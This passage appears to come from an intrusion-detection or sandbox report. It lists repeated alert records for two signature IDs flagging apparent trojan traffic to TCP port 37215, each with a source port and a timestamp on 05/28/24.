          SID:2829579
          Source Port:50098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543566
          SID:2835222
          Source Port:46250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760612
          SID:2829579
          Source Port:47314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536775
          SID:2835222
          Source Port:39468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.085432
          SID:2829579
          Source Port:52274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.324911
          SID:2829579
          Source Port:35346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.887030
          SID:2835222
          Source Port:45872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804666
          SID:2829579
          Source Port:34812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213509
          SID:2829579
          Source Port:48904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175766
          SID:2835222
          Source Port:50650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.181811
          SID:2829579
          Source Port:54454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369488
          SID:2829579
          Source Port:58498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.730508
          SID:2829579
          Source Port:56686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.162314
          SID:2835222
          Source Port:59290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154636
          SID:2829579
          Source Port:42948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401371
          SID:2835222
          Source Port:42248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774169
          SID:2835222
          Source Port:44636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588795
          SID:2829579
          Source Port:56188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.287607
          SID:2835222
          Source Port:47380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.488795
          SID:2835222
          Source Port:60764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484310
          SID:2829579
          Source Port:35642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.886390
          SID:2835222
          Source Port:51074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.501251
          SID:2829579
          Source Port:46018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944036
          SID:2835222
          Source Port:36982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760245
          SID:2835222
          Source Port:43714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338658
          SID:2829579
          Source Port:37166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666977
          SID:2835222
          Source Port:53158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.552415
          SID:2829579
          Source Port:45990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678541
          SID:2835222
          Source Port:42522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.613819
          SID:2829579
          Source Port:58868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543196
          SID:2829579
          Source Port:38084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868441
          SID:2835222
          Source Port:44450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.763945
          SID:2829579
          Source Port:53116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591467
          SID:2835222
          Source Port:48852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.313474
          SID:2835222
          Source Port:47966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535241
          SID:2835222
          Source Port:60000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268806
          SID:2829579
          Source Port:46394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472436
          SID:2835222
          Source Port:49876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033299
          SID:2835222
          Source Port:36000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890095
          SID:2835222
          Source Port:46106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.411984
          SID:2835222
          Source Port:44752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.985481
          SID:2835222
          Source Port:57672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.103223
          SID:2829579
          Source Port:46484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542195
          SID:2835222
          Source Port:53750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.631399
          SID:2829579
          Source Port:41986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143866
          SID:2829579
          Source Port:55596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195243
          SID:2835222
          Source Port:33146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033260
          SID:2835222
          Source Port:45456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.087771
          SID:2829579
          Source Port:50654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143446
          SID:2829579
          Source Port:58432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.894068
          SID:2835222
          Source Port:43570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.921311
          SID:2829579
          Source Port:36500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876633
          SID:2835222
          Source Port:53914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476789
          SID:2829579
          Source Port:37756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598780
          SID:2829579
          Source Port:33888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.022234
          SID:2835222
          Source Port:54310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560394
          SID:2835222
          Source Port:56866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.247575
          SID:2835222
          Source Port:39450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.301014
          SID:2829579
          Source Port:47410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117105
          SID:2835222
          Source Port:56020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.819437
          SID:2829579
          Source Port:33810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.768698
          SID:2835222
          Source Port:53722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.220692
          SID:2829579
          Source Port:48032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.422014
          SID:2835222
          Source Port:56634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949815
          SID:2829579
          Source Port:56194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.559949
          SID:2835222
          Source Port:38082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.471072
          SID:2829579
          Source Port:41204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.161594
          SID:2835222
          Source Port:40544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.222396
          SID:2835222
          Source Port:45310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.737353
          SID:2829579
          Source Port:37240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177117
          SID:2829579
          Source Port:39334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298240
          SID:2829579
          Source Port:42874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.075429
          SID:2835222
          Source Port:32776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528932
          SID:2829579
          Source Port:55530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922456
          SID:2829579
          Source Port:39264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.484124
          SID:2835222
          Source Port:41328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838785
          SID:2829579
          Source Port:51052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338708
          SID:2835222
          Source Port:55190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.623945
          SID:2835222
          Source Port:37672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213605
          SID:2829579
          Source Port:49868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535749
          SID:2835222
          Source Port:54862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400747
          SID:2835222
          Source Port:38078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403042
          SID:2829579
          Source Port:54482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.532807
          SID:2835222
          Source Port:34822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892682
          SID:2829579
          Source Port:38124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543536
          SID:2829579
          Source Port:46280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.981502
          SID:2835222
          Source Port:54016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.752850
          SID:2829579
          Source Port:47312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.853287
          SID:2829579
          Source Port:38022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.169804
          SID:2829579
          Source Port:59360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525512
          SID:2829579
          Source Port:37740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839363
          SID:2835222
          Source Port:49022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.713340
          SID:2829579
          Source Port:51856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.075040
          SID:2835222
          Source Port:44844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878575
          SID:2829579
          Source Port:36402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283685
          SID:2835222
          Source Port:38684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846864
          SID:2835222
          Source Port:33720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.167611
          SID:2829579
          Source Port:59848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797128
          SID:2829579
          Source Port:36832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923329
          SID:2829579
          Source Port:45456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.080676
          SID:2835222
          Source Port:44038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708894
          SID:2835222
          Source Port:38856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959101
          SID:2835222
          Source Port:58818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605914
          SID:2835222
          Source Port:56154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.545878
          SID:2835222
          Source Port:46994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.484730
          SID:2835222
          Source Port:44400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839229
          SID:2835222
          Source Port:52642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.155059
          SID:2835222
          Source Port:53138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551678
          SID:2835222
          Source Port:59918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528034
          SID:2835222
          Source Port:41068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949469
          SID:2829579
          Source Port:50748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115691
          SID:2835222
          Source Port:37594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103288
          SID:2835222
          Source Port:38648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846955
          SID:2829579
          Source Port:59570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708318
          SID:2829579
          Source Port:36698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.683631
          SID:2829579
          Source Port:39126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350503
          SID:2829579
          Source Port:49614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338098
          SID:2829579
          Source Port:42062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.245275
          SID:2835222
          Source Port:40934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594290
          SID:2829579
          Source Port:59080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978893
          SID:2835222
          Source Port:52424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485040
          SID:2835222
          Source Port:59488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044386
          SID:2835222
          Source Port:37216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196933
          SID:2829579
          Source Port:36484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838305
          SID:2829579
          Source Port:35552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.717262
          SID:2835222
          Source Port:58088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214824
          SID:2829579
          Source Port:37454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976534
          SID:2829579
          Source Port:48884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301192
          SID:2829579
          Source Port:55734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298862
          SID:2829579
          Source Port:49096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684584
          SID:2829579
          Source Port:42972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.948631
          SID:2829579
          Source Port:39540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803629
          SID:2829579
          Source Port:38706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743676
          SID:2829579
          Source Port:60102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.984941
          SID:2829579
          Source Port:55952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.151173
          SID:2835222
          Source Port:42384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295273
          SID:2829579
          Source Port:60064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102814
          SID:2835222
          Source Port:32960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560937
          SID:2829579
          Source Port:53394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.925394
          SID:2835222
          Source Port:47422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843148
          SID:2829579
          Source Port:59412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399207
          SID:2835222
          Source Port:47952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671347
          SID:2835222
          Source Port:60840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.358927
          SID:2835222
          Source Port:48270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401267
          SID:2829579
          Source Port:46624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.620317
          SID:2829579
          Source Port:40384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742339
          SID:2835222
          Source Port:36018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.305169
          SID:2835222
          Source Port:52468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652500
          SID:2829579
          Source Port:56318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403325
          SID:2835222
          Source Port:58244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176788
          SID:2829579
          Source Port:47896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176695
          SID:2835222
          Source Port:40706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.137916
          SID:2829579
          Source Port:58354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154334
          SID:2835222
          Source Port:40906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116719
          SID:2829579
          Source Port:46840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.680137
          SID:2829579
          Source Port:40504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.538865
          SID:2835222
          Source Port:34396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271903
          SID:2835222
          Source Port:46974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223205
          SID:2835222
          Source Port:38674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666992
          SID:2829579
          Source Port:41288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267987
          SID:2829579
          Source Port:40462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560939
          SID:2829579
          Source Port:54680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.532059
          SID:2835222
          Source Port:44056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.288027
          SID:2835222
          Source Port:42310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299873
          SID:2829579
          Source Port:35030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048770
          SID:2829579
          Source Port:37344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.766710
          SID:2835222
          Source Port:56042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102832
          SID:2829579
          Source Port:58310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324055
          SID:2829579
          Source Port:52538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.371504
          SID:2835222
          Source Port:39616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160700
          SID:2829579
          Source Port:49414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.237163
          SID:2835222
          Source Port:35686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464333
          SID:2829579
          Source Port:50300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678321
          SID:2829579
          Source Port:49566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048733
          SID:2835222
          Source Port:56062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745737
          SID:2829579
          Source Port:39010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.817640
          SID:2829579
          Source Port:55396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742350
          SID:2829579
          Source Port:59292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466592
          SID:2835222
          Source Port:49286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206975
          SID:2835222
          Source Port:40504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225916
          SID:2835222
          Source Port:35276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357126
          SID:2829579
          Source Port:52518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.300080
          SID:2835222
          Source Port:60504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891920
          SID:2829579
          Source Port:54696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.812732
          SID:2835222
          Source Port:40968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650614
          SID:2835222
          Source Port:56094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.807189
          SID:2829579
          Source Port:48070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.178416
          SID:2829579
          Source Port:47052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.653075
          SID:2835222
          Source Port:51712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240125
          SID:2835222
          Source Port:39688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839407
          SID:2829579
          Source Port:32880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547341
          SID:2835222
          Source Port:34800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594850
          SID:2835222
          Source Port:38136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.207010
          SID:2829579
          Source Port:60352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.923873
          SID:2835222
          Source Port:47338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709150
          SID:2835222
          Source Port:60260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298192
          SID:2835222
          Source Port:41610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152848
          SID:2835222
          Source Port:48642
          Destination Port:37215
